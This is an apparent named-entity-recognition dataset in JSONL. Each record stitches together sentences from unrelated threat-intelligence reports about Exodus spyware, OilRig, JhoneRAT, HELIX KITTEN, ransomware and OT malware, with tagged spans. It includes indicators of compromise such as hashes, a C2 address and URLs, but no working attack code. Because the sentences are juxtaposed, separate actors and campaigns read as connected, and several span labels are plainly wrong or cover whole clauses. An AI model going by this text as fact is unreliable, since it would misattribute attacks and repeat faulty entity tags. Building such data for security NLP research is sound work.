{"text": "Instances of this spyware were found on the Google Play Store , disguised as service applications from mobile operators . APT34 uses a mix of public and non-public tools ( Fig.2 ) and often uses compromised accounts to conduct spear-phishing operations . The first is responsible for checking if the system has the targeted keyboard layout \u2014 this is exclusively in Arabic-speaking countries . Our 2023 Ransomware Report unpacks the action in four zones : the US , Germany , France , and the UK .", "spans": [{"start": 44, "end": 61, "label": "System"}, {"start": 122, "end": 127, "label": "Organization"}, {"start": 142, "end": 169, "label": "System"}, {"start": 195, "end": 215, "label": "System"}, {"start": 402, "end": 412, "label": "Malware"}]}
{"text": "Both the Google Play Store pages and the decoys of the malicious apps are in Italian . In November 2017 , APT34 leveraged the Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER less than a week after Microsoft issued a patch . The second will create the persistence and , finally , the last one to be started is the main cycle for the RAT . Financial extrinsic Theft of personally identifiable information PII that is then monetized is a classic example of financial motivation of cyberattacks .", "spans": [{"start": 9, "end": 26, "label": "System"}, {"start": 106, "end": 111, "label": "Organization"}, {"start": 126, "end": 156, "label": "Vulnerability"}, {"start": 157, "end": 171, "label": "Vulnerability"}, {"start": 182, "end": 190, "label": "System"}, {"start": 195, "end": 206, "label": "System"}, {"start": 230, "end": 239, "label": "Organization"}, {"start": 365, "end": 368, "label": "System"}, {"start": 511, "end": 523, "label": "Organization"}]}
{"text": "According to publicly available statistics , as well as confirmation from Google , most of these apps collected a few dozens installations each , with one case reaching over 350 . Unit 42 's ongoing research into the OilRig campaign shows that the threat actors involved in the original attack campaign continue to add new Trojans to their toolset and continue their persistent attacks in the Middle East . As we explained before , the RAT targets specific countries by checking the keyboard 's layout . We provide at - risk organizations with the following discovery methods to conduct threat hunts for tactics , techniques , and procedures ( TTPs ) implemented derived from the toolset : \u2022 Establish collection and aggregation of host - based logs for crown jewels systems such as human - machine interfaces ( HMI ) , engineering workstations ( EWS ) , and OPC client servers within their environments and review logs for the evidence of Python script or unauthorized code execution on these systems .", "spans": [{"start": 74, "end": 80, "label": "Organization"}, {"start": 180, "end": 187, "label": "Organization"}, {"start": 248, "end": 261, "label": "Organization"}, {"start": 436, "end": 439, "label": "System"}, {"start": 520, "end": 538, "label": "Organization"}, {"start": 783, "end": 815, "label": "System"}, {"start": 820, "end": 844, "label": "System"}, {"start": 847, "end": 850, "label": "System"}, {"start": 859, "end": 903, "label": "System"}, {"start": 928, "end": 1001, "label": "Indicator"}]}
{"text": "All of the victims are located in Italy . When we first discovered the OilRig attack campaign in May 2016 , we believed at the time it was a unique attack campaign likely operated by a known , existing threat group . In fact , this is one of the first checks it performs when it is executed . Cisco Talos is aware of the recent advisory published by the U.S. Department of Health and Human Services ( HHS ) warning the healthcare industry about Rhysida ransomware activity .", "spans": [{"start": 202, "end": 214, "label": "Organization"}, {"start": 293, "end": 304, "label": "Organization"}, {"start": 354, "end": 406, "label": "Organization"}, {"start": 445, "end": 463, "label": "Malware"}]}
{"text": "All of these Google Play Store pages have been taken down by Google . The email address is associated with the Lebanese domain of a major global financial institution . The persistence is achieved by adding an entry with the name \" ChromeUpdater \" to the ' Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run ' . From what we \u2019ve seen in Hack520 \u2019s blog , as well as the infrastructure deployed around it , it is quite safe to say that Hack520 is involved in aspects of the VPS service activity provided to groups like Winnti and other cybercriminals or threat actors .", "spans": [{"start": 13, "end": 30, "label": "System"}, {"start": 61, "end": 67, "label": "Organization"}, {"start": 145, "end": 166, "label": "Organization"}, {"start": 336, "end": 351, "label": "Organization"}, {"start": 472, "end": 483, "label": "System"}, {"start": 517, "end": 523, "label": "Organization"}, {"start": 552, "end": 565, "label": "Organization"}]}
{"text": "We believe this spyware platform is developed by an Italian company called eSurv , which primarily operates in the business of video surveillance . POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 . This RAT uses three different cloud services to perform all its command and control ( C2 ) activities . The attackers only managed to deploy it to three machines on the organizations network and it was blocked on two of those three computers .", "spans": [{"start": 75, "end": 80, "label": "Organization"}, {"start": 148, "end": 156, "label": "System"}, {"start": 179, "end": 192, "label": "System"}, {"start": 213, "end": 226, "label": "Vulnerability"}, {"start": 234, "end": 237, "label": "System"}, {"start": 293, "end": 312, "label": "System"}, {"start": 315, "end": 317, "label": "System"}, {"start": 333, "end": 346, "label": "Organization"}]}
{"text": "According to public records it appears that eSurv began to also develop intrusion software in 2016 . In July 2017 , we observed the OilRig group using a tool they developed called ISMAgent in a new set of targeted attacks . It checks for new commands in the tweets from the handle @jhone87438316 ( suspended by Twitter ) every 10 seconds using the BeautifulSoup HTML parser to identify new tweets . Researchers first spotted the activity in March 2021 , but the MuddyWater campaign began in October 2019 targeting an Asian airline to steal flight reservation and continued to 2021 .", "spans": [{"start": 44, "end": 49, "label": "Organization"}, {"start": 132, "end": 144, "label": "Organization"}, {"start": 180, "end": 188, "label": "System"}, {"start": 311, "end": 318, "label": "System"}, {"start": 348, "end": 373, "label": "System"}, {"start": 462, "end": 481, "label": "Organization"}, {"start": 517, "end": 530, "label": "Organization"}]}
{"text": "Exodus is equipped with extensive collection and interception capabilities . In August 2017 , we found this threat group has developed yet another Trojan that they call ' Agent Injector ' with the specific purpose of installing the ISMAgent backdoor . These commands can be issued to a specific victim based on the UID generated on each target ( by using the disk serial and contextual information such as the hostname , the antivirus and the OS ) or to all of them . One explanation for this could be that that they used the region as a test zone ; another would be that the threat actor runs the operation from those locations , although it could also be a false flag meant to point the researchers on the wrong path .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 108, "end": 120, "label": "Organization"}, {"start": 232, "end": 249, "label": "System"}, {"start": 576, "end": 588, "label": "Organization"}]}
{"text": "Worryingly , some of the modifications enforced by the spyware might expose the infected devices to further compromise or data tampering . On August 23 , 2017 , we observed OilRig targeting an organization within the United Arab Emirates government . The Exfiltration , however , is done via other cloud providers . However , the problem in general with labeling every ransomware attack as sophisticated is that it excuses the organization that has nt followed the basic preventative best practices .", "spans": [{"start": 173, "end": 179, "label": "Organization"}, {"start": 238, "end": 248, "label": "Organization"}, {"start": 298, "end": 313, "label": "System"}]}
{"text": "Disguised Spyware Uploaded on Google Play Store We identified previously unknown spyware apps being successfully uploaded on Google Play Store multiple times over the course of over two years . Based on that research and this observation , we postulate that the OilRig group gathered credentials to a legitimate user 's OWA account and logged into the user 's account to send phishing attacks to other individuals within the same , targeted organization . The screenshots are exfiltrated via the ImgBB website . The messages show that Harrison was hired in March 2010 to help promote Ashley Madison online , but the messages also reveal Harrison was heavily involved in helping to create and cultivate phony female accounts on the service .", "spans": [{"start": 30, "end": 47, "label": "System"}, {"start": 125, "end": 142, "label": "System"}, {"start": 262, "end": 274, "label": "Organization"}, {"start": 496, "end": 501, "label": "System"}, {"start": 535, "end": 543, "label": "Organization"}, {"start": 584, "end": 598, "label": "Organization"}, {"start": 637, "end": 645, "label": "Organization"}]}
{"text": "These apps would remain available on the Play Store for months and would eventually be re-uploaded . The OilRig group continues to target organizations in the Middle East , in this instance targeting the government of the United Arab Emirates . The remaining commands send feedback by posting data into Google Forms . There are also many examples of nation - state actors leveraging contractors to develop offensive capabilities , as shown most recently in contracts between Russia \u2019s Ministry of Defense and NTC Vulkan .", "spans": [{"start": 41, "end": 51, "label": "System"}, {"start": 105, "end": 117, "label": "Organization"}, {"start": 204, "end": 214, "label": "Organization"}, {"start": 303, "end": 315, "label": "System"}, {"start": 350, "end": 371, "label": "Organization"}, {"start": 475, "end": 504, "label": "Organization"}, {"start": 509, "end": 519, "label": "Organization"}]}
{"text": "While details would vary , all of the identified copies of this spyware shared a similar disguise . The payload embedded within the ISMInjector sample delivered in this attack is a variant of the ISMAgent backdoor that we had discussed in detail in our blog discussing a targeted attack on a Saudi Arabian technology company . Finally , the RAT is able to download files encoded in base64 on Google Drive . [ As the documentary points out , the domain AshleyMadisonSucks.com was eventually transferred to Ashley Madison , which then shrewdly used it for advertising and to help debunk theories about why its service was supposedly untrustworthy ] .", "spans": [{"start": 132, "end": 150, "label": "System"}, {"start": 196, "end": 213, "label": "System"}, {"start": 306, "end": 324, "label": "Organization"}, {"start": 341, "end": 344, "label": "System"}, {"start": 392, "end": 404, "label": "System"}, {"start": 441, "end": 644, "label": "Organization"}]}
{"text": "In most cases they would be crafted to appear as applications distributed by unspecified mobile operators in Italy . Initial inspection of this attack suggested this was again the OilRig campaign using their existing toolset , but further examination revealed not only new variants of the delivery document we named Clayslide , but also a different payload embedded inside it . Feature-wise , the RAT has three commands : UNC2529 displayed indications of target research based on their selection of sender email addresses and subject lines which were tailored to their intended victims .", "spans": [{"start": 316, "end": 325, "label": "System"}, {"start": 397, "end": 400, "label": "System"}, {"start": 422, "end": 429, "label": "Organization"}, {"start": 455, "end": 521, "label": "Indicator"}, {"start": 526, "end": 585, "label": "Indicator"}]}
{"text": "Often the app description on the Play Store would reference some SMS messages the targets would supposedly receive leading them to the Play Store page . In July 2017 , we observed an attack on a Middle Eastern technology organization that was also targeted by the OilRig campaign in August 2016 . Take a screenshot and upload it to ImgBB . The Malwarebytes Threat Intelligence team is a highly skilled group of malware analysts .", "spans": [{"start": 33, "end": 43, "label": "System"}, {"start": 135, "end": 145, "label": "System"}, {"start": 210, "end": 233, "label": "Organization"}, {"start": 332, "end": 337, "label": "System"}, {"start": 344, "end": 381, "label": "Organization"}]}
{"text": "All of the Play Store pages we identified and all of the decoys of the apps themselves are written in Italian . This technique was observed in previous Clayslide documents to access the script variant of the Helminth Trojan in earlier OilRig attacks . Download binary disguised has a picture from Google Drive and execute it . For example , the government was credited with leading a multicountry operation to hack the ransomware group REvil , forcing it offline .", "spans": [{"start": 11, "end": 21, "label": "System"}, {"start": 152, "end": 171, "label": "System"}, {"start": 297, "end": 309, "label": "System"}, {"start": 345, "end": 355, "label": "Organization"}, {"start": 419, "end": 441, "label": "Organization"}]}
{"text": "According to Google , whom we have contacted to alert about our discoveries , nearly 25 variants of this spyware were uploaded on Google Play Store . In the past , we had primarily associated the OilRig campaign with using the Clayslide documents to deliver as a payload a Trojan we named Helminth ; in this instance , the payload was instead a variant of the ISMDoor Trojan with significant modifications which we are now tracking as ISMAgent . Execute a command and send the output to Google Forms . Once encryption is complete , it attempts to delete Volume Shadow VSS copies .", "spans": [{"start": 13, "end": 19, "label": "Organization"}, {"start": 130, "end": 147, "label": "System"}, {"start": 227, "end": 246, "label": "System"}, {"start": 289, "end": 297, "label": "System"}, {"start": 360, "end": 374, "label": "System"}, {"start": 435, "end": 443, "label": "System"}, {"start": 487, "end": 499, "label": "System"}]}
{"text": "Google Play has removed the apps and they stated that \" thanks to enhanced detection models , Google Play Protect will now be able to better detect future variants of these applications '' . The June 2017 sample of Clayslide contained the same OfficeServicesStatus.vbs file found in the ISMAgent Clayslide document , but instead of having the payload embedded in the macro as segregated base64 strings that would be concatenated , this variant obtained its payload from multiple cells within the \" Incompatible \" worksheet . The attacker put a couple of tricks in place to avoid execution on virtual machines ( sandbox ) . Budworm has targeted victims in many countries in Southeast Asia and the Middle East , among other locations , including the U.S. Symantecs Threat Hunter Team published a blog in October 2022 detailing how Budworm activity was seen on the network of a U.S. state legislature .", "spans": [{"start": 0, "end": 11, "label": "System"}, {"start": 94, "end": 113, "label": "System"}, {"start": 215, "end": 224, "label": "System"}, {"start": 244, "end": 273, "label": "Malware"}, {"start": 287, "end": 314, "label": "System"}, {"start": 611, "end": 618, "label": "System"}, {"start": 623, "end": 630, "label": "Organization"}, {"start": 644, "end": 651, "label": "Organization"}, {"start": 753, "end": 781, "label": "Organization"}, {"start": 829, "end": 845, "label": "Indicator"}, {"start": 875, "end": 897, "label": "Organization"}]}
{"text": "While Google did not share with us the total number of infected devices , they confirmed that one of these malicious apps collected over 350 installations through the Play Store , while other variants collected few dozens each , and that all infections were located in Italy . Clearly , OilRig incorporates a testing component within their development process , as we have previously observed OilRig performing testing activities on their delivery documents and their TwoFace webshells . The first trick is the check of the serial number of the disk . Between April 2022 and March 2023 , 39 % of the gang 's attacks hit education , compared to an average of just 4 % across all the other ransomware groups tracked by Malwarebytes .", "spans": [{"start": 167, "end": 177, "label": "System"}, {"start": 287, "end": 293, "label": "Organization"}, {"start": 393, "end": 399, "label": "Organization"}, {"start": 439, "end": 457, "label": "System"}, {"start": 468, "end": 485, "label": "System"}, {"start": 620, "end": 629, "label": "Organization"}, {"start": 688, "end": 705, "label": "Organization"}, {"start": 717, "end": 729, "label": "Organization"}]}
{"text": "We have directly observed multiple copies of Exodus with more than 50 installs and we can estimate the total number of infections to amount in the several hundreds , if not a thousand or more . While continuing research on the August 2018 attacks on a Middle eastern government that delivered BONDUPDATER , Unit 42 researchers observed OilRig 's testing activities and with high confidence links this testing to the creation of the weaponized delivery document used in this attack . The actor used the same technique in the macro and in the JhoneRAT . A main goal of this attack was to obtain access to email accounts .", "spans": [{"start": 45, "end": 51, "label": "Malware"}, {"start": 267, "end": 277, "label": "Organization"}, {"start": 293, "end": 304, "label": "System"}, {"start": 307, "end": 314, "label": "Organization"}, {"start": 336, "end": 342, "label": "Organization"}, {"start": 524, "end": 529, "label": "System"}, {"start": 541, "end": 549, "label": "Malware"}]}
{"text": "Stage 1 : Exodus One The first stage installed by downloading the malicious apps uploaded on Google Play Store only acts as a dropper . While investigating recent attacks performed by the threat actor group OilRig using their new Bondupdater version , Unit 42 researchers searched for additional Microsoft Office documents used by OilRig hoping to locate additional malware being used in other attacks during the same time period . By default , most of the virtual machines do not have a serial number on the disk . Some groups are even exploiting zero - day vulnerabilities , allowing them to cast a wider net of victims .", "spans": [{"start": 10, "end": 20, "label": "Malware"}, {"start": 93, "end": 110, "label": "System"}, {"start": 188, "end": 213, "label": "Organization"}, {"start": 230, "end": 241, "label": "System"}, {"start": 252, "end": 259, "label": "Organization"}, {"start": 331, "end": 337, "label": "Organization"}, {"start": 521, "end": 527, "label": "Organization"}, {"start": 548, "end": 574, "label": "Vulnerability"}]}
{"text": "Following are some examples of the decoys used by these droppers : The purpose of Exodus One seems to be to collect some basic identifying information about the device ( namely the IMEI code and the phone number ) and send it to the Command & Control server . The tester created the final test file less than 8 hours before the creation time of a delivery document , which was then delivered via a spear-phishing email 20 minutes later . The attacker used a second trick to avoid analysis of the python code . There was a massive decrease in the activity from Royal , for example , which normally dominates the monthly rankings \u2014 often cracking into the top five \u2014 with an average of roughly 30 attacks a month in that period .", "spans": [{"start": 82, "end": 92, "label": "Malware"}, {"start": 496, "end": 502, "label": "System"}, {"start": 560, "end": 565, "label": "Organization"}]}
{"text": "This is usually done in order to validate the target of a new infection . During this testing , we saw document filenames that contain the C2 we witnessed in the targeted attack above , specifically the filenames XLS-withyourface.xls and XLS-withyourface \u2013 test.xls . The actor used the same trick that FireEye in the Flare-On 6 : Challenge 7: They removed the header of the python bytecode . Leveraging this access , an attacker can send remote commands to affect the actuation of power line switches and circuit breakers to cause power disruption .", "spans": [{"start": 213, "end": 233, "label": "Malware"}, {"start": 238, "end": 265, "label": "Malware"}, {"start": 303, "end": 310, "label": "Organization"}, {"start": 318, "end": 328, "label": "System"}, {"start": 375, "end": 381, "label": "System"}]}
{"text": "This is further corroborated by some older and unobfuscated samples from 2016 , whose primary classes are named CheckValidTarget . These samples appeared to have been created by OilRig during their development and testing activities , all of which share many similarities with the delivery document used in the recent OilRig attack against a Middle Eastern government , N56.15.doc ( 7cbad6b3f505a199d6766a86b41ed23786bbb99dab9cae6c18936afdc2512f00 ) that we have also included in Table 1 . It can be perfectly executed without the header , but tools such as uncompyle6 need this header : $ uncompyle6 final2 . None : While OT - oriented malware families can be purpose built for a particular target environment , malware that takes advantage of insecure by design OT protocols , such as LIGHTWORK \u2019s abuse of the IEC-104 protocol , can be modified and employed multiple times to target multiple victims .", "spans": [{"start": 178, "end": 184, "label": "Organization"}, {"start": 357, "end": 367, "label": "Organization"}, {"start": 370, "end": 380, "label": "Malware"}, {"start": 558, "end": 568, "label": "System"}, {"start": 590, "end": 600, "label": "System"}, {"start": 617, "end": 653, "label": "Organization"}, {"start": 787, "end": 799, "label": "Malware"}, {"start": 813, "end": 829, "label": "Vulnerability"}]}
{"text": "During our tests the spyware was upgraded to the second stage on our test device immediately after the first check-ins . However , they later continued by making modifications to the Excel document just prior to the attack on August 26th . ImportError : Unknown magic number 227 in final2 . Therefore can be no leakage on our part .", "spans": [{"start": 291, "end": 330, "label": "Indicator"}]}
{"text": "This suggests that the operators of the Command & Control are not enforcing a validation of the targets . HELIX KITTEN is likely an Iranian-based adversary group , active since at least late 2015 , targeting organizations in the aerospace , energy , financial , government , hospitality and telecommunications business verticals . Additionally , the generated code by uncompyle6 varies depending on the version and the impact is important . Cisco Secure Malware Analytics ( formerly Threat Grid ) identifies malicious binaries and builds protection into all Cisco Secure products .", "spans": [{"start": 106, "end": 118, "label": "Organization"}, {"start": 156, "end": 161, "label": "Organization"}, {"start": 229, "end": 238, "label": "Organization"}, {"start": 241, "end": 247, "label": "Organization"}, {"start": 250, "end": 259, "label": "Organization"}, {"start": 262, "end": 272, "label": "Organization"}, {"start": 275, "end": 286, "label": "Organization"}, {"start": 291, "end": 318, "label": "Organization"}, {"start": 368, "end": 378, "label": "System"}, {"start": 441, "end": 471, "label": "System"}, {"start": 483, "end": 494, "label": "System"}]}
{"text": "Additionally , during a period of several days , our infected test device was never remotely disinfected by the operators . Additionally , HELIX KITTEN actors have shown an affinity for creating thoroughly researched and structured spear-phishing messages relevant to the interests of targeted personnel . Based on our analysis and the behaviour of the executed malware , the correct interpretation is the first one based on the oldest version of uncompyle6 . The vendor declined to release an update within the 90 - day period as outlined in Cisco \u2019s vulnerability disclosure policy .", "spans": [{"start": 139, "end": 158, "label": "Organization"}, {"start": 294, "end": 303, "label": "Organization"}, {"start": 447, "end": 457, "label": "System"}, {"start": 543, "end": 551, "label": "Organization"}]}
{"text": "For the purpose of this report we analyze here the Exodus One sample with hash 8453ce501fee1ca8a321f16b09969c517f92a24b058ac5b54549eabd58bf1884 which communicated with the Command & Control server at 54.71.249.137 . In addition to Helminth , the ISMDoor implant is likely used by the Iran-based adversary to attack targets particularly those in the Middle East region . For this specific condition , it is important because it 's filtering on the keyboard layout to identify the targets . A careful analysis of the domain registrations from this threat actor between 2014 and 2015 allowed us to identify one profile used to register several domains that were used as C&C servers for a particular malware family employed by the Winnti group .", "spans": [{"start": 51, "end": 61, "label": "Malware"}, {"start": 79, "end": 143, "label": "Indicator"}, {"start": 200, "end": 213, "label": "Indicator"}, {"start": 231, "end": 239, "label": "System"}, {"start": 246, "end": 253, "label": "System"}, {"start": 489, "end": 739, "label": "Malware"}]}
{"text": "Other samples communicated with other servers listed at the bottom of this report . These incidents involved spear-phishing attacks , which characteristic of HELIX KITTEN , included emails containing malicious PowerShell in their macros that connects to known C2 infrastructure . This campaign shows a threat actor interested in specific Middle Eastern and Arabic-speaking countries . With regards to these similarities , we highlight the following trends which could manifest in future OT malware : \u2022", "spans": [{"start": 158, "end": 170, "label": "Organization"}, {"start": 210, "end": 220, "label": "System"}, {"start": 487, "end": 497, "label": "Malware"}]}
{"text": "Exodus One checks-in by sending a POST request containing the app package name , the device IMEI and an encrypted body containing additional device information . During the summer of 2018 , HELIX KITTEN actors were observed targeting entities in the Middle East \u2014 of note , targets appeared to be located in Bahrain and Kuwait . It also shows us an actor that puts effort in opsec by only using cloud providers . This technique has been used by the group for some time , with reports of INISafeWebSSO being leveraged dating as far back as 2018 .", "spans": [{"start": 190, "end": 209, "label": "Organization"}, {"start": 375, "end": 380, "label": "System"}, {"start": 395, "end": 410, "label": "System"}, {"start": 449, "end": 454, "label": "Organization"}, {"start": 487, "end": 500, "label": "System"}]}
{"text": "The encrypted body is composed of various identifiers which are joined together : doFinal ( ) is called to encrypt the device information string : The user agent string is built from the package name and IMEI number : Finally the HTTP request is sent to the server at https : //54.71.249.137/eddd0317-2bdc-4140-86cb-0e8d7047b874 . ISMDoor is able to exfiltrate data , take screenshots , and execute arbitrary commands on the victim 's machine . The malicious documents , the droppers and the RAT itself are developed around cloud providers . The PDF usually named \u201c CriticalBreachDetected.pdf \u201d is generated using content embedded in the ransomware binary , including the skeleton PDF and the ransom note .", "spans": [{"start": 268, "end": 328, "label": "Indicator"}, {"start": 331, "end": 338, "label": "System"}, {"start": 350, "end": 365, "label": "Malware"}, {"start": 368, "end": 384, "label": "Malware"}, {"start": 391, "end": 417, "label": "Malware"}, {"start": 492, "end": 495, "label": "System"}, {"start": 524, "end": 539, "label": "System"}, {"start": 542, "end": 594, "label": "Indicator"}]}
{"text": "Many of the strings in the application are XOR 'd with the key Kjk1MmphFG : After some additional requests , the dropper made a POST request to https : //54.71.249.137/56e087c9-fc56-49bb-bbd0-4fafc4acd6e1 which returned a zip file containing the second stage binaries . In early November 2018 , CrowdStrike observed activity from the HELIX KITTEN adversary at a customer in the telecommunications vertical . Additionally the attackers implemented anti-VM ( and sandbox ) and anti-analysis tricks to hide the malicious activities to the analyst . Harrison signed his threatening missive with the salutation , \u201c We are legion , \u201d suggesting that whatever comeuppance he had in store for Ashley Madison would come from a variety of directions and anonymous hackers .", "spans": [{"start": 144, "end": 204, "label": "Indicator"}, {"start": 295, "end": 306, "label": "Organization"}, {"start": 334, "end": 346, "label": "Organization"}, {"start": 378, "end": 396, "label": "Organization"}, {"start": 447, "end": 454, "label": "System"}, {"start": 461, "end": 468, "label": "System"}, {"start": 475, "end": 495, "label": "System"}, {"start": 546, "end": 554, "label": "Organization"}, {"start": 685, "end": 699, "label": "Organization"}]}
{"text": "Stage 2 : Exodus Two The Zip archive returned by the check-in performed by Exodus One is a collection of files including the primary payload mike.jar and several compiled utilities that serve different functions . The attackers sent multiple emails containing macro-enabled XLS files to employees working in the banking sector in the Middle East . For example , the VM or the sandbox must have the keyboard layout of the targeted countries and a disk serial number . While the Kritec skimmer hangs around the Google Tag Manager script , we believe it is not related to the other active campaigns .", "spans": [{"start": 10, "end": 20, "label": "Malware"}, {"start": 75, "end": 85, "label": "Malware"}, {"start": 141, "end": 149, "label": "Indicator"}, {"start": 218, "end": 227, "label": "Organization"}, {"start": 274, "end": 283, "label": "Malware"}, {"start": 287, "end": 326, "label": "Organization"}, {"start": 366, "end": 368, "label": "System"}, {"start": 376, "end": 383, "label": "System"}, {"start": 477, "end": 491, "label": "Malware"}, {"start": 509, "end": 534, "label": "Malware"}, {"start": 586, "end": 595, "label": "Organization"}]}
{"text": "At least in most recent versions , as of January 2019 , the Zip archive would actually contain the i686 , arm and arm64 versions of all deployed binaries . In the first week of May 2016 , FireEye 's DTI identified a wave of emails containing malicious attachments being sent to multiple banks in the Middle East region . This campaign started in November 2019 and it is still ongoing . According to Kaspersky telemetry , targeted organizations included political bodies in Europe .", "spans": [{"start": 188, "end": 202, "label": "Organization"}, {"start": 242, "end": 263, "label": "Malware"}, {"start": 287, "end": 292, "label": "Organization"}, {"start": 399, "end": 408, "label": "Organization"}, {"start": 453, "end": 469, "label": "Organization"}]}
{"text": "File Name Modified Date SHA256 null_arm 2018-02-27 06:44:00 48a7dd672931e408662d2b5e1abcd6ef00097b8ffe3814f0d2799dd6fd74bd88 null_i686 2018-02-27 06:44:00 c228a534535b22a316a97908595a2d793d0fecabadc32846c6d1bfb08ca9a658 null_arm64 2018-02-27 06:43:00 48a7dd672931e408662d2b5e1abcd6ef00097b8ffe3814f0d2799dd6fd74bd88 Our data suggests that actors have deployed the RGDoor backdoor on webservers belonging to eight Middle Eastern government organizations , as well as one financial and one educational institution . At this time , the API key is revoked and the Twitter account is suspended . Analysis of memory core dump files", "spans": [{"start": 60, "end": 124, "label": "Indicator"}, {"start": 155, "end": 219, "label": "Indicator"}, {"start": 251, "end": 315, "label": "Indicator"}, {"start": 339, "end": 345, "label": "Organization"}, {"start": 364, "end": 379, "label": "System"}, {"start": 428, "end": 452, "label": "Organization"}, {"start": 470, "end": 479, "label": "Organization"}, {"start": 488, "end": 511, "label": "Organization"}, {"start": 560, "end": 567, "label": "System"}]}
{"text": "sepolicy-inject_arm 2019-01-08 04:55:00 47449a612697ad99a6fbd6e02a84e957557371151f2b034a411ebb10496648c8 sepolicy-inject_arm64 2019-01-08 04:55:00 824ad333320cbb7873dc49e61c14f749b0e0d88723635524463f2e6f56ea133a sepolicy-inject_i686 2019-01-08 04:55:00 13ec6cec511297ac3137cf7d6e4a7c4f5dd2b24478a06262a44f13a3d61070b6 In August 2018 , Unit 42 observed OilRig targeting a government organization using spear-phishing emails to deliver an updated version of a Trojan known as BONDUPDATER . However , the attacker can easily create new accounts and update the malicious files in order to still work . LIGHTWORK ( filename : OT_T855_IEC104_GR.exe ) ( MD5 : 7b6678a1c0000344f4faf975c0cfc43d ) is a disruption tool written in C++ that implements the IEC-104 protocol to modify the state of RTUs over TCP .", "spans": [{"start": 40, "end": 104, "label": "Indicator"}, {"start": 147, "end": 211, "label": "Indicator"}, {"start": 253, "end": 317, "label": "Indicator"}, {"start": 335, "end": 342, "label": "Organization"}, {"start": 352, "end": 358, "label": "Organization"}, {"start": 371, "end": 394, "label": "Organization"}, {"start": 474, "end": 485, "label": "System"}, {"start": 598, "end": 607, "label": "System"}, {"start": 610, "end": 642, "label": "Indicator"}, {"start": 647, "end": 685, "label": "Indicator"}, {"start": 688, "end": 797, "label": "Malware"}]}
{"text": "rootdaemon_arm 2019-01-08 04:55:00 00c787c0c0bc26caf623e66373a5aaa1b913b9caee1f34580bdfdd21954b7cc4 rootdaemon_arm64 2019-01-08 04:55:00 3ee3a973c62ba5bd9eab595a7c94b7a26827c5fa5b21964d511ab58903929ec5 mike.jar 2018-12-06 05:50:00 a42a05bf9b412cd84ea92b166d790e8e72f1d01764f93b05ace62237fbabe40e The OilRig group has been active since at least mid-2016 , and continues their attack campaigns throughout the Middle East , targeting both governmental agencies and businesses on an almost routine basis . This campaign shows us that network-based detection is important but must be completed by system behaviour analysis . KillMilk : Self - Proclaimed Founder of KillNet", "spans": [{"start": 35, "end": 99, "label": "Indicator"}, {"start": 137, "end": 201, "label": "Indicator"}, {"start": 202, "end": 210, "label": "Indicator"}, {"start": 231, "end": 295, "label": "Indicator"}, {"start": 300, "end": 312, "label": "Organization"}, {"start": 436, "end": 457, "label": "Organization"}, {"start": 462, "end": 472, "label": "Organization"}, {"start": 620, "end": 628, "label": "Organization"}, {"start": 660, "end": 667, "label": "Organization"}]}
{"text": "rootdaemon_i686 2019-01-08 04:55:00 b46f282f9a1bce3798faee3212e28924730a657eb93cda3824c449868b6ee2e7 zygotedaemonarm 2019-01-08 04:55:00 e3f65f84dd6c2c3a5a653a3788d78920c0321526062a6b53daaf23fa57778a5f zygotedaemonarm64 2019-01-08 04:55:00 11499ff2418f4523344de81a447f6786fdba4982057d4114f64db929990b4b59 BONDUPDATER is a PowerShell-based Trojan first discovered by FireEye in mid-November 2017 , when OilRig targeted a different Middle Eastern governmental organization . JhoneRAT : 273aa20c4857d98cfa51ae52a1c21bf871c0f9cd0bf55d5e58caba5d1829846f . Marlin is a notable split from OilRigs typical TTPs .", "spans": [{"start": 36, "end": 100, "label": "Indicator"}, {"start": 137, "end": 201, "label": "Indicator"}, {"start": 240, "end": 304, "label": "Indicator"}, {"start": 305, "end": 316, "label": "System"}, {"start": 322, "end": 345, "label": "System"}, {"start": 366, "end": 373, "label": "Organization"}, {"start": 402, "end": 408, "label": "Organization"}, {"start": 445, "end": 470, "label": "Organization"}, {"start": 473, "end": 481, "label": "Malware"}, {"start": 484, "end": 548, "label": "Indicator"}, {"start": 551, "end": 557, "label": "Malware"}, {"start": 582, "end": 589, "label": "Organization"}]}
{"text": "zygotedaemoni686 2019-01-08 04:55:00 3c9f08b3280851f54414dfa5a57f40d3b7be7b73736fa0ba21b078e75ce54d33 sapp.apk 2019-01-08 04:53:00 4bf1446c412dd5c552539490d03e999a6ceb96ae60a9e7846427612bec316619 placeholder 2018-03-29 16:31:00 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 During the past month , Unit 42 observed several attacks against a Middle Eastern government leveraging an updated version of the BONDUPDATER malware , which now includes the ability to use TXT records within its DNS tunneling protocol for its C2 communications . JhoneRAT : 29886dbbe81ead9e9999281e62ecf95d07acb24b9b0906b28beb65a84e894091 . Adversaries may perform data destruction over the course of an operation .", "spans": [{"start": 37, "end": 101, "label": "Indicator"}, {"start": 102, "end": 110, "label": "Indicator"}, {"start": 131, "end": 195, "label": "Indicator"}, {"start": 228, "end": 292, "label": "Indicator"}, {"start": 317, "end": 324, "label": "Organization"}, {"start": 375, "end": 385, "label": "Organization"}, {"start": 423, "end": 442, "label": "System"}, {"start": 506, "end": 519, "label": "System"}, {"start": 557, "end": 565, "label": "Malware"}, {"start": 568, "end": 632, "label": "Indicator"}]}
{"text": "After download , Exodus One would dynamically load and execute the primary stage 2 payload mike.jar using the Android API DexClassLoader ( ) . The email had no subject and what initially drew our attention to OilRig 's attack was the content of the spear phishing email . JhoneRAT : d5f10a0b5c103100a3e74aa9014032c47aa8973b564b3ab03ae817744e74d079 . Among the group \u2019s most interesting characteristics are : \u2022 Strong functional and structural similarities linking its malware toolset to early MiniDuke and more recent CosmicDuke and OnionDuke components In early 2013 , GReAT observed several incidents that were so unusual they suggested the existence of a new , previously unknown threat actor .", "spans": [{"start": 17, "end": 27, "label": "Malware"}, {"start": 91, "end": 99, "label": "Indicator"}, {"start": 110, "end": 121, "label": "System"}, {"start": 209, "end": 215, "label": "Organization"}, {"start": 272, "end": 280, "label": "Malware"}, {"start": 283, "end": 347, "label": "Indicator"}, {"start": 493, "end": 501, "label": "Malware"}, {"start": 518, "end": 528, "label": "Malware"}, {"start": 533, "end": 542, "label": "Malware"}, {"start": 570, "end": 575, "label": "Organization"}]}
